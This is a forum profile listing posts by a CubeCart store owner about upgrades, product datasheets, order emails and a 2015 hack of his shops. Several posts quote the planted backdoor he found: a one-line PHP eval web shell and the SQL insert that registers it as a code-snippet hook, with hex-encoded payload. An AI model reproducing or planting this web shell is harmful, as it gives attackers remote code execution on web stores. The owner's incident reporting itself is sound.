Jump to content

Frank Auffret

Member
  • Posts

    83
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Frank Auffret

  1. Yes thanks I used the downloads system to upload the pdf then just copied the url into the link in the product description. Then just changed the .htacess file protecting the downloads folder. Easy enough for me but the client will require something less cluncky Senior moment! Just remembered this will do until I find a more client-friendly mod
  2. Are there any mods available to add product datasheets (pdf) with admin function
  3. My server runs PHP 5.4.45 so does that mean the latest CC upgrade won't install or won't work after it installs?
  4. In Version 6.0.11 Thanks bsmither - Works for me! In the file /includes/ckeditor/config.js: Around line: 8 Add after config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck'; config.filebrowserBrowseUrl = document.location.pathname+'?_g=filemanager&mode=fck_digital'; Then as above In the file /admin/sources/filemanager.index.inc.php: Find near line 28: case 'digital': $mode = FileManager::FM_FILETYPE_DL; break; On a new blank line ABOVE that, add: case 'fck_digital': $GLOBALS['main']->hideNavigation(true); $select_button = true;
  5. The store (5.2.16)was patched on September 7th and upgraded to 6.0.8 on December 9 shortly before the attack - spotted on December 18. I upgraded all other sites at same time so would have checked for malicious folders, files and snippets in includes/extra (can't remember if I checked the table though). It's a dedicated webserver so I'll see if I can find out when the file adminer.php was uploaded and the code snippet added to the table. I can see from the Cubecart staff access logs there are two successful admin logins recorded with no admin username and dodgy IP numbers. Dec 14 2015, 22:41 PM 93.115.95.216 Nov 28 2015, 04:12 AM 142.4.213.25 All other login IP's check out OK It looks like access was made without a username on December 14. & November 28. Was it possible to do this using the original security issue? Is there anything else I should check?
  6. Hi bsmither Thanks for your reply. I did remove the snippet from the table as well and I checked all of my CC sites today to make sure there's nothing malicious. Although three of them were affected earlier this month, this particular site hasn't been attacked before. I added the admin fix last September when the security alert was posted and I have now upgraded each site to 6.0.8. Just left wondering how these snippets and files get uploaded?
  7. I just had similar with Cubecart 6.0.8 Since the previous attack I regularly check all Cubecart sites (all 6.0.8) and today I found a code snippet in the hooks I went through all the files and removed anything that was either not supposed to be there or redundant. Checking the staff logs I spotted this entry but no username. Dec 14 2015, 22:41 PM 93.115.95.216 Y edited to add this site was not previously attacked I found this file in the root adminer.php
  8. Hi All four of my websites that use Cube Cart were hacked this week and crap files and folders with advertising stuff uploaded to the root. I was using version 5.2.16 but have now upgraded all to 6.0.8 The server is set up with SuExec so no folders are writable from outside the server so I'm not sure how they got in. I am suspecting cKeditor but that's just a guess. It would be very useful to know were the vulnerability was/is. Has anyone else experienced this? Found previous post on subject - removed code snippets! Update: Just checked my files and the sites affected had the security patch added admin.class.php
  9. Hi bsmither Sorry I've been away for a few days So far no more link problems - since I deleted the snippet file BTW I exported it from the DB before I deleted it here's the sql INSERT INTO `CubeCart_code_snippet` (`snippet_id`, `enabled`, `unique_id`, `description`, `hook_trigger`, `php_code`, `version`, `author`, `priority`) VALUES (1, 1, 'snippet8GsxU', 'Snippet', 'controller.index', 0x3c3f706870206576616c28245f524551554553545b223847737855225d293b3f3e, '', '', 3); Thanks for your help with this issue
  10. Thanks again for your suggestions I managed to read the BLOB it was same as file content <?php eval($_REQUEST["8GsxU"]);?> I searched all tables but didn't find any reference to 8GsxU so I deleted the record - it wasn't there in the sql file migrated from the old server the folders are all set to rxwr-xr-x because I am using suExec so don't know how that file arrived in that folder. I have deleted all site files except images and /includes/global.inc.php and re-upped from a clean version 5.2.16 Just have to see if it happens again
  11. Asked for logs but also found this file /includes/extra/snippet_0777be0bd41002b59fc2f777d9c7d77e.php created14/05/2015 contains just one line <?php eval($_REQUEST["8GsxU"]);?> looks a bit suspicious to me
  12. Hmm same thing happened again today I did change the Session id last night so don't get this. This time I emptied the files from the cache manually so it's wait and see.
  13. Thanks for the reply, very odd thing this but I will take your advice regarding the session name and see what happens Before I downloaded the site files from the old server I cleared the caches on both sites so any files in there would have been created after the migration was completed. I think the migrations of these two sites were on consecutive days. but still doesn't make a lot of sense as the site worked as it should for over a week - orders were received - then for some reason the URL of the other store got cached. Thanks again much appreciated.
  14. This is weird! Two weeks ago I started migrating all my customers sites to a new web server. Starting with the Cubecart sites as they take a little longer to migrate. Cubecart site A was downloaded from the old server along with an export from the database then uploaded to the new server and tested all OK A day or two later Cubecart site B followed same process, tested all OK Site B took orders OK up until 2 days ago. Today I had a call from the client to say a customer had tried to buy online but when clicking the links in the left column, pages from Site A loaded? I checked and found the same issue. In admin the correct products were listed all settings were normal. The caches were cleared and that reverted Site B to working order. I haven't touched either site since the migration so can anyone explain how that can happen? Both sites run CC version 5.2.16 Sorry posted in wrong forum should have been in General Technical Support Mods can you help?
  15. OK test site seems to be working OK - not really a bug just missing files in version 5 skin templates folder?
  16. Hi I just upgraded my CC test site to version 6.0.0b7 Works OK with foundation skin but version 5 skins didn't work and this error was logged [Exception] xxxxxxxxxxxxxxx/store/includes/lib/smarty/sysplugins/smarty_internal_templatebase.php:127 - Unable to load template file 'templates/element.social.php' I added /element.social.php' to the v5 skin templates folder and it now loads. Just wondering if there's anything else I need to do when using a version 5 skin?
  17. Phew thanks Bsmither I found a back up of filemanager and it worked.
  18. Trying to understand how images are associated with products. I have a customer who accidently managed to delete all product images (no idea how) I re-installed them from backup and ran a database backup too. The images appeared in the admin images list after I ran update files list but all associations with the products are missing. I checked the image_index table and file associations seem to be intact - yet the products have no associated images. Is there something else I can do? UPDATED to say DB filemanager file_id seems to have been re-numbered as file_ids no longer match those in the images_index table Can this be fixed or is it a manual labour job going through each product
  19. Older versions used to send admin email before the payment option was completed. I know some store managers didn't like that but I have two customers who use print order form as an alternative payment option so now they don't get any order notifications unless they log in to admin and change the order status manually. I have reported this as an issue. Thanks for your contributions
  20. OK I changed the print order form (POF) setting to 'send mail' and received the customer confirmation OK I also changed the administrators setting to 'Receive order notifications' but no admin emails arrived until I changed the order status to 'completed' then I received an admin email on both the store email and the administrator email. Previous versions used to send an admin email when the order was made even if payment failed. That I thought was good as it gave the store owner the option of calling the customer and asking if they wanted to pay by alternative means. Edited to add Just set up card capture with 'send confirmation email' enabled - again received customer copy OK but didn't receive an admin email until after the order status was changed. With Card Capture the order status is only ever changed by the store administrator when processing the order so the admin email is only send after the order has been processed - that's not a lot of use. Am I correct to assume that if using a payment gateway like Worldpay or Paypal the external process sends the payment status back to the site which changes the order status and sends the admin emails?
  21. I'm checking out a test version of 5.2.16 with only print order form and find that no email is sent to either the customer or the admin until the order status is changed to order complete. Is that normal?
  22. My problem fixed by Al at support. He said it was a new problem which he fixed by changing a line in /controllers/controller.admin.session.true.inc.php around line 80 depending on version from: $default_priority = $module_order[$_GET['type']][strtolower($_GET['module'])]; to: $default_priority = 1; Hope this helps somebody
  23. I have the same issue on all of my Version 5 sites if I try to edit a module all I see is a blank page or http 500 error in IE I just installed version 5.1.6 on a spare domain and that has the same issue can't edit any module. There's nothing in the Cube cart error logs.
  24. Hi Can't seem to get image cropper to work. When trying to edit I see a small square portion of the image. When I click on the handle to expand it the image disappears altogether. Only the handle remains and can't be selected at all - any idea what can be worng? I've just upgraded the site to V5.2.1
×
×
  • Create New...